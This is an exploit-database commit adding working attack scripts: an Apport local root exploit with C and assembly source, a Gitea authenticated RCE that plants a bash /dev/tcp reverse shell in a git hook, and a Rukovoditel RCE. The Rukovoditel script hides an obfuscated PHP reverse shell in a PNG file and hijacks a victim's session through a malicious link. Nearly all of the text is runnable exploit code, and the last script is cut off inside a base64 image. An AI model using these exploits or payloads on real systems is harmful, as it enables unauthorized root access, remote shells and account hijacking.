DB: 2021-02-19

7 changes to exploits/shellcodes

BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)

Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path

Apport 2.20 - Local Privilege Escalation

Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)

Rukovoditel 2.6.1 - RCE
Rukovoditel 2.6.1 - RCE (1)

Gitea 1.12.5 - Remote Code Execution (Authenticated)

Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
This commit is contained in:
Offensive Security 2021-02-19 05:01:53 +00:00
parent bbe36569c3
commit cc85c56b4c
8 changed files with 1121 additions and 1 deletions

View file

@ -0,0 +1,316 @@
# Exploit Title: Apport 2.20 - Local Privilege Escalation
# Date: 18/02/21
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://ubuntu.com/
# Version:
Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5
Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16
Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23
Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30
# Tested on: Ubuntu
This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234.
# Setup
To compile the exploit code several packages are needed:
sudo apt-get install build-essential nasm gcc
# Compilation
make
# Run
./exploit.sh
The reverse shell will connect on the next execution of logrotate
nc -l -p 1234
## Makefile ##
.PHONY: all clean
CC=gcc
CFLAGS=
NASM=nasm
NASM_FLAGS=-f elf64
LD=ld
all: exploit crash decoy
exploit: exploit.c
$(CC) -o $@ $< $(CFLAGS)
chmod +x $@
crash: crash.o
$(LD) $^ -o $@
decoy: decoy.o
$(LD) $^ -o $@
crash.o: crash.asm
$(NASM) $(NASM_FLAGS) $^
decoy.o: decoy.asm
$(NASM) $(NASM_FLAGS) $^
clean:
rm exploit decoy crash *.o
## crash.asm ##
section .data
message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00
timeval:
tv_sec dd 0
tv_usec dd 0
section .text
global _start
_start:
mov dword [tv_sec], 4000000
mov dword [tv_usec], 0
mov rax, 35
mov rdi, timeval
mov rsi, 0
syscall
## decoy.asm ##
section .text
global _start
_start:
mov dword [0], 0
## exploit.c ##
#include <unistd.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define PID_THRESHOLD (80)
int read_max_pid_file()
{
FILE *fd = 0;
char buf[256];
fd = fopen("/proc/sys/kernel/pid_max", "r");
fread(buf, sizeof(buf), 1, fd);
fclose(fd);
return atoi(buf);
}
void write_to_fifo_file(char * path)
{
FILE *fd = 0;
char buf[] = "A";
fd = fopen(path, "w");
fwrite(buf, sizeof(buf), 1, fd);
fclose(fd);
return;
}
int main(int argc, char *argv[])
{
int iteration = 0;
pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1;
int current_pid = 0, max_pid = 0;
int total_pid = 0;
char *crash_argv[] = {"crash", NULL};
char *sudo_argv[] = {"sudo", "-S", "sud", NULL};
char current_dir[1024] = {0};
char exec_buf[2048] = {0};
char crash_buf[2048] = {0};
struct stat sb = {0} ;
int null_fd = -1;
signal(SIGCHLD, SIG_IGN);
getcwd(current_dir, sizeof(current_dir));
snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0");
snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash");
chdir("/etc/logrotate.d/");
// Creating the crash program
if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR)
{
crash_pid = fork();
if (0 == crash_pid)
{
execve(crash_buf, crash_argv, NULL);
exit(0);
}
else if(-1 == crash_pid)
{
printf("[-] Could not fork program\n");
return -1;
}
}
else
{
printf("[-] Please check crash file executable.");
return -1;
}
max_pid = read_max_pid_file();
printf("[*] crash pid: %d\n", crash_pid);
printf("[*] max pid: %d\n", max_pid);
printf("[*] Creating ~%d PIDs\n", max_pid);
printf("[*] Forking new processes\n");
sleep(3);
// Iterating through max_pid to almost reach the crash program pid
while (iteration < max_pid - 1)
{
// Print progress of forks
if( 0 == (iteration % (int)(max_pid / 5000)))
{
printf("\rIteration: %d/%d", iteration + 1, max_pid);
fflush(stdout);
}
temp_pid = -1;
temp_pid = fork();
if (0 == temp_pid)
{
exit(0);
}
else if (temp_pid > 0)
{
iteration++;
// We should stop before the crash pid to avoid other processes created meanwhile to interfere the exploit process
if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD)
{
printf("\rIteration: %d/%d\n", iteration + 1, max_pid);
fflush(stdout);
printf("[+] less then %d pid from the target: last fork=%d , target: %d\n", PID_THRESHOLD, temp_pid, crash_pid);
break;
}
}
else if (-1 == temp_pid)
{
printf("[-] Could not fork temp programs\n");
}
}
printf("[*] Crashing the crash program\n");
kill(crash_pid, SIGSEGV); // From Now on the seconds apport will launch and we have 30 seconds to exploit it
sleep(5);
printf("[*] Killing the crash program\n");
kill(crash_pid, SIGKILL);
sleep(3);
// Now crash pid is free and we need to occupy it
for(int i=0; i < PID_THRESHOLD ; i++)
{
spray_pid = fork();
if (0 == spray_pid)
{
if (crash_pid == getpid())
{
null_fd = open("/dev/null", O_WRONLY);
dup2(null_fd, 1);
dup2(null_fd, 2);
close(null_fd);
printf("[+] Creating suid process\n");
execve(exec_buf, sudo_argv, NULL);
}
exit(0);
}
}
sleep(3);
printf("[*] Writing to fifo file\n");
write_to_fifo_file(argv[1]);
// Now the first apport released and the second apport resumed
printf("[+] Wrote core file to cwd!\n");
sleep(10); // Waiting for the second apport to finish execution
return 0;
}
## exploit.sh ##
#!/bin/sh
set -e
echo "[*] Running exploit"
touch /var/crash/test.log
ulimit -c unlimited
if [ ! -d "~/.config/apport" ]; then
echo "[*] Settings directory not exists"
echo "[*] Creating settings directory"
mkdir -p ~/.config/apport
fi
if [ ! -f "~/.config/apport/settings" ] ; then
echo "[*] Settings file not exists"
echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings
echo "[+] Settings file created"
fi
DECOY_PATH=`realpath ./decoy`
MY_UID=`id -u`
DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'`
DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}"
if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then
echo "[*] decoy crash exists deleting the file"
rm $DECOY_CRASH_PATH
fi
mkfifo $DECOY_CRASH_PATH
echo "[+] FIFO file created"
./decoy 2>&1 >/dev/null &
killall -SIGSEGV ./decoy
echo "[+] Decoy process created"
SUDO_PATH=`which sudo`
ln -s $SUDO_PATH "linkchange"
python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')"
echo "[+] symlink to sudo created"
./exploit $DECOY_CRASH_PATH
rm $DECOY_CRASH_PATH
sleep 5
if [ -f "/etc/logrotate.d/core" ] ; then
echo "[*] Exploit succesfully finished"
else
echo "[*] Exploit failed"
fi
# Kill the sudo process after second apport finished
kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'`
##

View file

@ -0,0 +1,245 @@
# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Date: 17 Feb 2020
# Exploit Author: Podalirius
# PoC demonstration article: https://podalirius.net/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# Vendor Homepage: https://gitea.io/
# Software Link: https://dl.gitea.io/
# Version: >= 1.1.0 to <= 1.12.5
# Tested on: Ubuntu 16.04 with GiTea 1.6.1
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import os
import pexpect
import random
import re
import sys
import time
import requests
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
pass
class GiTea(object):
def __init__(self, host, verbose=False):
super(GiTea, self).__init__()
self.verbose = verbose
self.host = host
self.username = None
self.password = None
self.uid = None
self.session = None
def _get_csrf(self, url):
pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"'
csrf = []
while len(csrf) == 0:
r = self.session.get(url)
csrf = re.findall(pattern, r.text)
time.sleep(1)
csrf = csrf[0]
return csrf
def _get_uid(self, url):
pattern = 'name="_uid" content="([0-9]+)"'
uid = re.findall(pattern, self.session.get(url).text)
while len(uid) == 0:
time.sleep(1)
uid = re.findall(pattern, self.session.get(url).text)
uid = uid[0]
return int(uid)
def login(self, username, password):
if self.verbose == True:
print(" [>] login('%s', ...)" % username)
self.session = requests.Session()
r = self.session.get('%s/user/login' % self.host)
self.username = username
self.password = password
# Logging in
csrf = self._get_csrf(self.host)
r = self.session.post(
'%s/user/login?redirect_to=%%2f%s' % (self.host, self.username),
data = {'_csrf':csrf, 'user_name':username, 'password':password},
allow_redirects=True
)
if b'Username or password is incorrect.' in r.content:
return False
else:
# Getting User id
self.uid = self._get_uid(self.host)
return True
def repo_create(self, repository_name):
if self.verbose == True:
print(" [>] Creating repository : %s" % repository_name)
csrf = self._get_csrf(self.host)
# Create repo
r = self.session.post(
'%s/repo/create' % self.host,
data = {
'_csrf' : csrf,
'uid' : self.uid,
'repo_name' : repository_name,
'description' : "Lorem Ipsum",
'gitignores' : '',
'license' : '',
'readme' : 'Default',
'auto_init' : 'off'
}
)
return None
def repo_delete(self, repository_name):
if self.verbose == True:
print(" [>] Deleting repository : %s" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name))
# Delete repository
r = self.session.post(
'%s/%s/%s/settings' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'action' : "delete",
'repo_name' : repository_name
}
)
return
def repo_set_githook_pre_receive(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_pre_receive('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name))
# Set pre receive git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def repo_set_githook_update(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_update('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name))
# Set update git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def repo_set_githook_post_receive(self, repository_name, content):
if self.verbose == True:
print(" [>] repo_set_githook_post_receive('%s')" % repository_name)
csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name))
# Set post receive git hook
r = self.session.post(
'%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name),
data = {
'_csrf' : csrf,
'content' : content
}
)
return
def logout(self):
if self.verbose == True:
print(" [>] logout()")
# Logging out
r = self.session.get('%s/user/logout' % self.host)
return None
def trigger_exploit(host, username, password, repository_name, verbose=False):
# Create a temporary directory
tmpdir = os.popen('mktemp -d').read().strip()
os.chdir(tmpdir)
# We create some files in the repository
os.system('touch README.md')
rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)])
os.system('echo "%s" >> README.md' % rndstring)
os.system('git init')
os.system('git add README.md')
os.system('git commit -m "Initial commit"')
# Connect to remote source repository
os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name))
# Push the files (it will trigger post-receive git hook)
conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir)
conn.expect("Username for .*: ")
conn.sendline(username)
conn.expect("Password for .*: ")
conn.sendline(password)
conn.expect("Total.*")
print(conn.before.decode('utf-8').strip())
return None
def header():
print(""" _____ _ _______
/ ____(_)__ __| CVE-2020-14144
| | __ _ | | ___ __ _
| | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution
| |__| | | | | __/ (_| |
\_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5
""")
if __name__ == '__main__':
header()
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.')
parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)')
parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username')
parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password')
parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP')
parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port')
parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.')
args = parser.parse_args()
if (args.rev_ip == None or args.rev_port == None):
if args.payload_file == None:
print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed')
sys.exit(-1)
# Read specific payload file
if args.payload_file != None:
f = open(args.payload_file, 'r')
hook_payload = ''.join(f.readlines())
f.close()
else:
hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port)
if args.target.startswith('http://'):
pass
elif args.target.startswith('https://'):
pass
else:
args.target = 'https://' + args.target
print('[+] Starting exploit ...')
g = GiTea(args.target, verbose=args.verbose)
if g.login(args.username, args.password):
reponame = 'vuln'
g.repo_delete(reponame)
g.repo_create(reponame)
g.repo_set_githook_post_receive(reponame, hook_payload)
g.logout()
trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose)
g.repo_delete(reponame)
else:
print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.')
print('[+] Exploit completed !')

376
exploits/php/webapps/48784.py Executable file
View file

@ -0,0 +1,376 @@
#!/usr/bin/python3
# Exploit Title: Rukovoditel 2.7.1 - Remote Code Execution (Authenticated)
# Exploit Author: @_danyx07
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: Rukovoditel < 2.7
# Tested on: Debian 9 Rukovoditel 2.6.1
# CVE : CVE-2020-11819
# Description : This exploit has two modes of execution, using the session fixation vulnerability (CVE-2020-15946) or using the access credentials of any account under any profile.
# With the --type L option, this script will create a malicious link, if the link is accessed in a browser by the victim, an arbitrary session identifier will be set that will be used to steal their session after uploading an image with PHP content on their photo profile, and then use local file include (CVE-2020-11819) to get a nice reverse shell.
# Or, with the options --type C -u <username> -p <password> you can provide credentials, load the image with PHP content and use local file inclusion (CVE-2020-11819) to achieve the execution of code.
# Protip: remember to check if the registration module is enabled ;)
import sys
import requests
from bs4 import BeautifulSoup
import re
import base64
import argparse
import os
from shutil import copyfile
import datetime
import hashlib
import socket
import threading
import time
import random
import uuid
__version__ = '1.0'
parser = argparse.ArgumentParser(description=
"Post-authenticate RCE for rukovoditel, script version %s" % __version__,
usage='\n %(prog)s -t <target> -a L --ip attacker IP --port attacker port [options]\n %(prog)s -t <target> -a C -u <username> -p <password> --ip attacker IP --port attacker port [options]\n\n')
parser.add_argument('-t', '--target', metavar='URL', type=str, required=True,
help='URL/Full path to CMS Rukovoditel http://url/path/to/cms/')
parser.add_argument('-u', '--user', type=str,
help='Username for authentication')
parser.add_argument('-p', '--password', type=str,
help='Password for authentication')
parser.add_argument('-a', '--type', required=True, type=str,
help='Use -a L to generate the link and steal the session or use -a C if you have access credentials to the web application')
parser.add_argument('--ip', metavar="IP_ATTACKER", required=True, type=str,
help='IP attacker for reverse shell!')
parser.add_argument('--port', metavar="PORT_ATTACKER", required=True, type=str,
help='Port for reverse shell connection')
parser.add_argument('--proxy', metavar="PROXY",
help='Setup http proxy for debbugin http://127.0.0.1:8080')
args = parser.parse_args()
# Global variables
s = requests.Session()
url = args.target
user = args.user
pwd = args.password
typeAttack = args.type
IP=args.ip
PORT=args.port
proxyDict = {"http" : args.proxy, "https" : args.proxy}
csrf_token=""
pht=None
flag_access=False
sid = uuid.uuid4().hex
def serverShell():
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server_address = (IP,int(PORT))
server.bind((server_address))
server.listen(0)
print("[+] Listening on %s:%s" % (IP,PORT))
conn,addr = server.accept()
print("[+] Accepted connection from %s and port %s" % (addr[0],addr[1]))
print("Type 'quit' for exit")
server.settimeout(10)
while True:
cmd = input()
if cmd == 'quit':
print("[-] Closing connection with the shell")
conn.close()
server.close()
break
cmd = cmd + "\n"
if len(str(cmd)) > 0:
command = conn.send(cmd.encode('utf-8'))
try:
response = conn.recv(2048)
print(response.decode('utf-8'))
except server.timeout:
print("Didn't receive data!")
finally:
server.close()
conn.close()
def authByCookie():
global flag_access
global sid
url_hijack = url+'index.php?sid='+sid
url_in = url+"index.php?module=dashboard/"
print("[+] Send this URL to the victim -> %s" % url_hijack)
while True:
if flag_access == True:
break
def checkAccess(stop):
global flag_access
time.sleep(3)
while True:
if typeAttack == 'L':
s.cookies.clear()
s.cookies.set('sid',sid)
url_login = url+'index.php?module=users/account'
r = s.get(url_login, proxies=proxyDict)
response = r.text
if response.find('account_form') != -1:
print("[+] Access granted!")
soup = BeautifulSoup(response, 'lxml')
csrf_token = soup.find('input')['value']
flag_access=True
else:
print("[-] Waiting for access")
if stop():
break
time.sleep(3)
return 0
def makeAuth():
url_login = url+'index.php?module=users/login&action=login'
r = s.get(url_login, proxies=proxyDict)
html = r.text
soup = BeautifulSoup(html, 'lxml')
csrf_token = soup.find('input')['value']
print("[+] Getting CSRF Token %s" % csrf_token )
auth = {'username':user, 'password':pwd, 'form_session_token':csrf_token}
print("[+] Trying to authenticate with username %s" % user)
r = s.post(url_login, data=auth, proxies=proxyDict)
response = r.text
if response.find("login_form") != -1:
print("[-] Authentication failed... No match for Username and/or Password!")
return -1
def createEvilFile():
rv = """
/*<?php /**/
unlink(__FILE__);
@error_reporting(0);
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$dis=@ini_get('disable_functions');
if(!empty($dis)){
$dis=preg_replace('/[, ]+/', ',', $dis);
$dis=explode(',', $dis);
$dis=array_map('trim', $dis);
}else{
$dis=array();
}
$ipaddr='"""+IP+"""';
$port="""+PORT+""";
if(!function_exists('SsMEEaClAOR')){
function SsMEEaClAOR($c){
global $dis;
if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {
$c=$c." 2>&1\\n";
}
$RhoVbBR='is_callable';
$vaVrJ='in_array';
if($RhoVbBR('proc_open')and!$vaVrJ('proc_open',$dis)){
$handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
$o=NULL;
while(!feof($pipes[1])){
$o.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($RhoVbBR('shell_exec')and!$vaVrJ('shell_exec',$dis)){
$o=shell_exec($c);
}else
if($RhoVbBR('exec')and!$vaVrJ('exec',$dis)){
$o=array();
exec($c,$o);
$o=join(chr(10),$o).chr(10);
}else
if($RhoVbBR('popen')and!$vaVrJ('popen',$dis)){
$fp=popen($c,'r');
$o=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$o.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($RhoVbBR('system')and!$vaVrJ('system',$dis)){
ob_start();
system($c);
$o=ob_get_contents();
ob_end_clean();
}else
if($RhoVbBR('passthru')and!$vaVrJ('passthru',$dis)){
ob_start();
passthru($c);
$o=ob_get_contents();
ob_end_clean();
}else
{
$o=0;
}
return $o;
}
}
$nofuncs='no exec functions';
if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
$s=@fsockopen("tcp://$ipaddr",$port);
while($c=fread($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=SsMEEaClAOR(substr($c,0,-1));
if($out===false){
fwrite($s,$nofuncs);
break;
}
}
fwrite($s,$out);
}
fclose($s);
}else{
$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
@socket_connect($s,$ipaddr,$port);
@socket_write($s,"socket_create");
while($c=@socket_read($s,2048)){
$out = '';
if(substr($c,0,3) == 'cd '){
chdir(substr($c,3,-1));
} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
break;
}else{
$out=SsMEEaClAOR(substr($c,0,-1));
if($out===false){
@socket_write($s,$nofuncs);
break;
}
}
@socket_write($s,$out,strlen($out));
}
@socket_close($s);
}
"""
encoded_bytes = rv.encode('ascii')
b64_bytes = base64.b64encode(encoded_bytes);
payload = b64_bytes.decode('ascii')
createImage()
copyfile("./tux.png","/tmp/evil-tux.png")
evilF = open('/tmp/evil-tux.png','a+')
evilF.write("<?php eval(base64_decode(\""+payload+"\")); ?>")
evilF.close()
print("[+] Evil file created!")
def searchFile(etime):
cdate = etime
for i in range(3600,52200,900):
h1 = hashlib.sha1()
img1 = str(cdate+i)+"_evil-tux.png"
h1.update(img1.encode('utf-8'))
r = requests.get(url+"uploads/users/"+h1.hexdigest())
if r.status_code == 200:
print(r.text)
return h1.hexdigest()
h2 = hashlib.sha1()
img2 = str(cdate-i)+"_evil-tux.png"
h2.update(img2.encode('utf-8'))
r = requests.get(url+"uploads/users/"+h2.hexdigest())
if r.status_code == 200:
#print(r.text)
return h2.hexdigest()
i+1800
return ""
def uploadFile():
global pht
print("[+] Trying to upload evil file!...")
form_data1 = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':'english.php'}
files = {'fields[10]':open('/tmp/evil-tux.png','rb')}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=form_data1, proxies=proxyDict)
date = r.headers['Date']
etime = int(datetime.datetime.strptime(date, '%a, %d %b %Y %H:%M:%S GMT').strftime('%s'))
#reg = re.findall(r"([a-fA-F\d]{40})",r.text)
reg = None
if not reg:
print("[-] The file name was not found in the response :(")
fileUp = searchFile(etime)
else:
fileUp = reg[0]
print("[+] Looking for the file name uploaded...")
r = s.get(url+"/uploads/users/"+fileUp)
if r.status_code!=200:
print("[-] File name couldn't be found!")
exit()
pht="../../uploads/users/"+fileUp
print("[+] String for path traversal is %s" % pht)
def updateProfile(oplang="english.php"):
if oplang == "english.php":
print("[+] Updating profile with language %s " % oplang)
payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
files = {"":""}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
return 0
else:
print("[+] Updating user profile field[13] <--file inclusion through path traversal... Wait for the shell :)")
payload = {'form_session_token':csrf_token, 'fields[7]':'Administrator', 'fields[8]':'PoC', 'fields[9]':'admin@mail.com', 'fields[13]':oplang, 'fields[10]':''}
files = {"":""}
url_upload = url+'index.php?module=users/account&action=update'
r = s.post(url_upload, files=files, data=payload, proxies=proxyDict)
serverShell()
def createImage():
if os.path.exists("tux.png"):
return
imgb64 = "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